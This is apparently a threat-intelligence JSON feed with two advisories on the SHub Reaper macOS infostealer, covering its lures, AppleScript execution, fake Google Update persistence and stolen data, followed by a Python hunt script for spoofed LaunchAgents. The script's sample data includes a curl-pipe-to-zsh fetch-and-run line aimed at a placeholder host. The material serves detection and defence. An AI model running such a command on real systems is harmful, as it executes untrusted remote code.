{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/miro/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["WeChat","Miro","macOS Script Editor","Google Software Update"],"_cs_severities":["high"],"_cs_tags":["macos","infostealer","backdoor","social-engineering","applescript"],"_cs_type":"advisory","_cs_vendors":["Apple","Google","Microsoft"],"content_html":"\u003cp\u003eThe SHub Reaper stealer is a macOS infostealer that blends traditional stealer functionality with persistent backdoor capabilities. It is distributed through social engineering lures such as fake WeChat and Miro installers. The malware marks a shift in macOS stealer tradecraft, moving away from ClickFix-style Terminal paste lures to AppleScript-based execution to evade detection. SHub Reaper uses a multi-brand spoofing technique, impersonating Apple, Google, and Microsoft across the infection chain. It installs a fake Google Update framework to maintain persistence and establishes a backdoor, allowing arbitrary command execution and continuous compromise of the infected system. 
This represents an evolution in macOS infostealers, combining \u0026ldquo;smash-and-grab\u0026rdquo; data theft with long-term access and control.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack starts with malicious web pages offering fake Miro and WeChat installers.\u003c/li\u003e\n\u003cli\u003eVictims download and execute the fake installers, initiating the infection chain.\u003c/li\u003e\n\u003cli\u003eThe malware may be hosted on a typosquatted Microsoft domain.\u003c/li\u003e\n\u003cli\u003eThe installer executes under the guise of a fake Apple security update.\u003c/li\u003e\n\u003cli\u003eSHub Reaper installs a fake Google Update framework under the user Library paths for persistence.\u003c/li\u003e\n\u003cli\u003eA LaunchAgent is registered using Google Keystone-style naming conventions to ensure the malware runs regularly.\u003c/li\u003e\n\u003cli\u003eThe malware beacons to a command and control server every 60 seconds, supporting arbitrary command execution.\u003c/li\u003e\n\u003cli\u003eThe malware steals credentials, hijacks crypto wallets, and exfiltrates documents while maintaining persistent backdoor access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful SHub Reaper infections can lead to significant data loss, including sensitive credentials, cryptocurrency assets, and confidential documents. The persistent backdoor allows attackers to maintain long-term access to compromised systems, enabling further data theft, command execution, and potential lateral movement within the network. The shift from ClickFix tactics to AppleScript execution sidesteps detections that key on Terminal activity, increasing the risk of successful compromise. 
This combination of stealer and backdoor capabilities makes SHub Reaper a particularly dangerous threat to macOS users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unexpected invocations of Script Editor (\u003ccode\u003eScript Editor.app\u003c/code\u003e) to detect potential AppleScript-based execution, as outlined by SentinelOne\u0026rsquo;s report.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting \u003ccode\u003eosascript\u003c/code\u003e spawning \u003ccode\u003ecurl\u003c/code\u003e or shell interpreters to identify malicious AppleScript activity.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule for detecting browser-to-AppleScript execution chains to identify potential initial access vectors.\u003c/li\u003e\n\u003cli\u003eEducate macOS users to be wary of software installers from untrusted sources and to verify the authenticity of software updates, as this is the primary infection vector.\u003c/li\u003e\n\u003cli\u003eMonitor user Library paths for the installation of unexpected Google Update frameworks and LaunchAgents with Google Keystone-style naming conventions, as these are indicators of persistence.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-19T19:53:19Z","date_published":"2026-05-19T19:53:19Z","id":"https://feed.craftedsignal.io/briefs/2026-05-shub-reaper-macos-backdoor/","summary":"The SHub Reaper stealer combines credential theft, wallet hijacking, and document exfiltration with persistent backdoor access on macOS, distributed through fake WeChat and Miro installers while spoofing Apple, Google, and Microsoft to evade detection.","title":"SHub Reaper Stealer Backdoors macOS with Multi-Brand 
Spoofing","url":"https://feed.craftedsignal.io/briefs/2026-05-shub-reaper-macos-backdoor/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Chrome","Firefox","Edge","Opera","Vivaldi","Arc","Orion","WeChat","Miro","MetaMask","Phantom","1Password","Bitwarden","LastPass","Exodus","Atomic Wallet","Ledger Live","Trezor Suite","iCloud","Telegram"],"_cs_severities":["high"],"_cs_tags":["macos","infostealer","shub reaper","malware"],"_cs_type":"advisory","_cs_vendors":["Apple","Google","Mozilla","Brave","Microsoft","Opera","Vivaldi","Arc","Orion","MetaMask","Phantom","1Password","Bitwarden","LastPass","Exodus","Atomic Wallet","Ledger","Trezor"],"content_html":"\u003cp\u003eA new variant of the SHub macOS infostealer, dubbed Reaper, has emerged, employing a novel approach to bypass existing security mitigations. Unlike previous SHub campaigns that relied on tricking users into pasting commands in Terminal, Reaper leverages the \u003ccode\u003eapplescript://\u003c/code\u003e URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript. This technique circumvents Apple\u0026rsquo;s late March mitigations in macOS Tahoe 26.4, which aimed to block the execution of harmful commands pasted into the Terminal. SentinelOne researchers discovered that victims are lured by fake installers for WeChat and Miro applications hosted on domains designed to appear legitimate. 
The lure site fingerprints the victim\u0026rsquo;s device to detect virtual machines and VPNs and enumerates installed browser extensions for password managers and cryptocurrency wallets, sending the telemetry to the attacker via a Telegram bot.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim visits a malicious website impersonating WeChat or Miro.\u003c/li\u003e\n\u003cli\u003eThe website fingerprints the visitor\u0026rsquo;s device, checking for VMs/VPNs and enumerating browser extensions. This information is sent to a Telegram bot.\u003c/li\u003e\n\u003cli\u003eThe website prompts the user to download the fake installer; the download link is an \u003ccode\u003eapplescript://\u003c/code\u003e URL rather than a file.\u003c/li\u003e\n\u003cli\u003eClicking the URL opens the macOS Script Editor with a preloaded malicious AppleScript.\u003c/li\u003e\n\u003cli\u003eIf the user clicks \u0026ldquo;Run\u0026rdquo; in the Script Editor, the script displays a fake Apple security update message referencing XProtectRemediator.\u003c/li\u003e\n\u003cli\u003eThe script downloads a shell script using \u003ccode\u003ecurl\u003c/code\u003e and executes it silently via \u003ccode\u003ezsh\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe shell script checks for a Russian keyboard layout; if detected, the malware exits.\u003c/li\u003e\n\u003cli\u003eIf the keyboard layout is not Russian, the script retrieves and executes a malicious AppleScript with data theft routines via \u003ccode\u003eosascript\u003c/code\u003e. This script prompts the user for their macOS password, and then steals browser data, cryptocurrency wallet data, and other sensitive files. 
The malware establishes persistence by installing a script impersonating Google Software Update and registering it as a LaunchAgent that runs every minute as a beacon.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful infection by the SHub Reaper infostealer results in the theft of sensitive data, including browser data from Chrome, Firefox, Edge, Opera, Vivaldi, Arc, and Orion, browser wallet extension data (MetaMask, Phantom), password manager data (1Password, Bitwarden, LastPass), desktop cryptocurrency wallet application data (Exodus, Atomic Wallet, Ledger Live, Trezor Suite), iCloud account data, Telegram session data, and developer configuration files. The malware also targets files in the Desktop and Documents folders, collecting documents under 2 MB and images up to 6 MB, with a 150 MB total cap. Cryptocurrency wallet applications are hijacked by replacing their core application file with a malicious version downloaded from the C2 server. 
This gives the attacker persistent access to the compromised machine and enables further malware deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for outbound connections made shortly after Script Editor or \u003ccode\u003eosascript\u003c/code\u003e execution, including \u003ccode\u003ecurl\u003c/code\u003e fetches and the 60-second beacon.\u003c/li\u003e\n\u003cli\u003eMonitor for the creation of new LaunchAgents and related files in the namespace of trusted vendors to detect persistence mechanisms, as recommended by SentinelOne.\u003c/li\u003e\n\u003cli\u003eBlock the known malicious domains \u003ccode\u003eqq-0732gwh22[.]com\u003c/code\u003e, \u003ccode\u003emlcrosoft[.]co[.]com\u003c/code\u003e, and \u003ccode\u003emlroweb[.]com\u003c/code\u003e at the DNS resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-18T21:42:54Z","date_published":"2026-05-18T21:42:54Z","id":"https://feed.craftedsignal.io/briefs/2026-05-shub-macos-reaper/","summary":"A new variant of the 'SHub' macOS infostealer, dubbed Reaper, uses AppleScript to display a fake security update message and install a backdoor, ultimately stealing browser data, financial documents, and cryptocurrency wallet information while bypassing Terminal-based mitigations in macOS.","title":"SHub macOS Infostealer Variant 'Reaper' Spoofing Apple Security Updates","url":"https://feed.craftedsignal.io/briefs/2026-05-shub-macos-reaper/"}],"language":"en","title":"CraftedSignal Threat Feed — Miro","version":"https://jsonfeed.org/version/1.1"}
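The two briefs above converge on the same two detection opportunities: a LaunchAgent that borrows Google Keystone naming but launches something other than Google's updater, and osascript spawning curl or a shell. The following is an added example, not CraftedSignal's or SentinelOne's code, that turns those recommendations into runnable hunt logic. The home directory, the two sample plists, the process events and the update.example.invalid URL are constructed; the directories treated as legitimate Google Keystone install roots are an assumption and should be confirmed against a known-good host before the script is used for triage.

```python
"""Hunt logic for the two detection opportunities named in the briefs above:
(1) LaunchAgents that borrow Google Keystone naming but run something other than
Google's updater, and (2) osascript spawning curl or a shell. All plists, paths
and process events are constructed sample data; the Keystone roots are an assumption."""
import pathlib
import plistlib
import re

HOME = "/Users/alice"  # constructed home directory for the sample data
# Assumption: genuine Google Keystone binaries live only under these roots.
GOOGLE_ROOTS = (f"{HOME}/Library/Google/GoogleSoftwareUpdate/",
                "/Library/Google/GoogleSoftwareUpdate/")
GOOGLE_LABEL = re.compile(r"^com\.google\.(keystone|GoogleUpdater)", re.I)
INTERPRETERS = {"osascript", "sh", "zsh", "bash", "python3"}
FETCH_OR_SHELL = {"curl", "sh", "zsh", "bash"}
BEACON_SECONDS = 60  # both briefs describe a 60-second C2 beacon


def parse_launch_agent(plist_bytes: bytes) -> dict:
    """Pull the fields the checks need out of a LaunchAgent plist (XML or binary)."""
    d = plistlib.loads(plist_bytes)
    argv = d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else [])
    return {"label": d.get("Label", ""), "argv": argv,
            "program": argv[0] if argv else "", "interval": d.get("StartInterval")}


def assess_launch_agent(agent: dict) -> list[str]:
    """Return why an agent looks like Keystone-style spoofing; [] means nothing found."""
    reasons = []
    label, program, argv = agent["label"], agent["program"], agent["argv"]
    if GOOGLE_LABEL.match(label):
        if not program.startswith(GOOGLE_ROOTS):
            reasons.append(f"{label}: program outside Google roots: {program}")
        # Keystone runs a signed Mach-O helper, never an interpreter plus a script file.
        if program.rsplit("/", 1)[-1] in INTERPRETERS or any(
                a.endswith((".sh", ".scpt", ".applescript")) for a in argv):
            reasons.append(f"{label}: launches a script: {' '.join(argv)}")
    if agent["interval"] is not None and agent["interval"] <= BEACON_SECONDS:
        reasons.append(f"{label}: StartInterval {agent['interval']}s is beacon-like")
    return reasons


def scan_launch_agents(directory: str) -> dict[str, list[str]]:
    """Assess every plist in a LaunchAgents directory such as ~/Library/LaunchAgents."""
    findings = {}
    for path in pathlib.Path(directory).expanduser().glob("*.plist"):
        try:
            reasons = assess_launch_agent(parse_launch_agent(path.read_bytes()))
        except Exception as exc:  # a plist launchd cannot load still deserves a look
            reasons = [f"unparseable plist: {exc}"]
        if reasons:
            findings[str(path)] = reasons
    return findings


def detect_osascript_chains(events: list[dict]) -> list[tuple[str, str]]:
    """Pair each osascript process with any curl/shell child it spawned."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (parent and parent["image"].rsplit("/", 1)[-1] == "osascript"
                and e["image"].rsplit("/", 1)[-1] in FETCH_OR_SHELL):
            hits.append((parent["cmdline"], e["cmdline"]))
    return hits


# Constructed sample plists: a genuine-looking Keystone agent and a spoofed one.
LEGIT_KEYSTONE = f"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.google.keystone.agent</string>
<key>ProgramArguments</key><array>
<string>{HOME}/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
<string>-runMode</string><string>ifneeded</string></array>
<key>StartInterval</key><integer>3523</integer>
</dict></plist>""".encode()
SPOOFED_KEYSTONE = f"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.google.keystone.system.agent</string>
<key>ProgramArguments</key><array><string>/bin/zsh</string>
<string>{HOME}/Library/Application Support/GoogleUpdate/update.sh</string></array>
<key>RunAtLoad</key><true/><key>StartInterval</key><integer>60</integer>
</dict></plist>""".encode()
# Constructed process events in the shape of an EDR process-tree export.
PROCESS_EVENTS = [
    {"pid": 501, "ppid": 1, "image": "/usr/bin/osascript", "cmdline": "osascript /tmp/update.scpt"},
    {"pid": 502, "ppid": 501, "image": "/bin/zsh",
     "cmdline": "zsh -c curl -fsSL https://update.example.invalid/s | zsh"},
    {"pid": 600, "ppid": 1, "image": "/usr/bin/osascript", "cmdline": "osascript -e beep"},
    {"pid": 601, "ppid": 600, "image": "/usr/bin/say", "cmdline": "say done"},  # benign child
]

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT_KEYSTONE), ("spoofed", SPOOFED_KEYSTONE)):
        print(name, assess_launch_agent(parse_launch_agent(raw)))
    print("chains:", detect_osascript_chains(PROCESS_EVENTS))
    print("live scan:", scan_launch_agents("~/Library/LaunchAgents"))
```

On the sample data the genuine-looking agent produces no findings, the spoofed one trips all three checks, and only the zsh child of the first osascript is reported. The path allowlist is the fragile piece: the first brief says the fake framework lands under the user Library paths, so a copy written into the assumed Google root itself would pass that check, which is why the interpreter-plus-script check and the beacon interval are evaluated independently rather than gated on the path result.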